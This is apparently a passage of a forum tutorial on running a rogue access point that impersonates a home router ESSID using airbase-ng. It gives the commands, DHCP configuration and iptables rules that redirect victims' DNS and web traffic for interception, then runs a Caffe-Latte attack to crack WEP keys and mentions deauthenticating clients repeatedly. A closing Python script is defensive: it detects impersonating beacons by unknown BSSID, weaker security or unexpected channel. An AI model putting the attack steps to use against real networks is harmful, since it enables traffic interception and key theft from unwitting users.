Code:
airbase-ng -e BTHomeHub2 -c 1 wlan0
-e Essid For AP
-c Channel Number
wlan0 Wireless Interface
This will then create a tap device, as shown below:
Code:
root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0
08:15:24 Created tap interface at0
08:15:24 Trying to set MTU on at0 to 1500
08:15:24 Trying to set MTU on wlan0 to 1800
08:15:24 Access Point with BSSID 00:C0:CA:47:32:24 started.
Now that we have the AP running, we need to make it so the clients can obtain an IP address, so let's set up our IP tables.
Code:
ifconfig at0 up
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254
Here is my dhcp.conf:
Code:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.254;
    option domain-name-servers home;
    range 192.168.1.1 192.168.1.140;
}
Once that has been entered and saved, the DHCP server can be started:
Code:
/etc/init.d/dhcp3-server start
Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
Code:
airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
Code:
root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0
08:33:13 Created tap interface at0
08:33:13 Trying to set MTU on at0 to 1500
08:33:13 Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32 Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: "BTHomeHub2"
08:33:32 Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.
-L caffe-latte attack
-W 1 WEP encryption on
-x Number of packets per second to send
-e Essid
-c channel Number
wlan0 wireless interface
The only problem is that I haven't managed to get the caffe-latte attack fully working, due to the fact that the only time it captures IVs correctly is when the client reconnects to the AP, so the only way I've had caffe-latte working kind of well is to deauthenticate the client every 10 seconds.
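For the defending side, an access point started this way shows up in a wireless survey as a familiar ESSID announced from an unfamiliar BSSID, channel or security level. The following is an added example, not part of the original post: it checks scan results against an inventory of the real network. The inventory values, the `Beacon` record and the sample scan are constructed assumptions; only the ESSID, channel 1, the WEP flag and the BSSID in the second sample entry come from the output above.

```python
from dataclasses import dataclass

# Assumed inventory of the legitimate network. The BSSID, channel and security
# level below are constructed placeholders, not values from the page.
KNOWN = {"BTHomeHub2": {"bssids": {"00:11:22:33:44:55"}, "channels": {6}, "security": "WPA2"}}
RANK = {"OPEN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}  # weakest to strongest


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str


def assess(beacon, known=KNOWN):
    """Return the reasons a beacon for a known ESSID looks like an impersonation."""
    profile = known.get(beacon.ssid)
    if profile is None:  # not one of our networks, nothing to compare against
        return []
    reasons = []
    if beacon.bssid.lower() not in {b.lower() for b in profile["bssids"]}:
        reasons.append("unknown-bssid")
    # Checked independently of the BSSID, because a BSSID can be cloned.
    if RANK.get(beacon.security.upper(), -1) < RANK[profile["security"]]:
        reasons.append("security-downgrade")
    if beacon.channel not in profile["channels"]:
        reasons.append("unexpected-channel")
    return reasons


def report(beacons, known=KNOWN):
    """Return (bssid, security, reasons) for every suspicious beacon."""
    return [(b.bssid, b.security, r) for b in beacons if (r := assess(b, known))]


# Constructed scan results. The second entry mirrors the page's WEP run
# (ESSID BTHomeHub2, channel 1, BSSID from the airbase-ng output).
SAMPLE = [
    Beacon("BTHomeHub2", "00:11:22:33:44:55", 6, "WPA2"),  # legitimate AP
    Beacon("BTHomeHub2", "00:C0:CA:47:32:24", 1, "WEP"),   # impersonating AP
    Beacon("BTHomeHub2", "00:11:22:33:44:55", 6, "WEP"),   # cloned BSSID, weaker security
    Beacon("OtherNet", "66:77:88:99:AA:BB", 11, "WPA2"),   # unrelated network
]

if __name__ == "__main__":
    for row in report(SAMPLE):
        print(row)
```

The security-level comparison is what still fires when the BSSID has been copied from the real access point, which an allowlist of BSSIDs alone would miss.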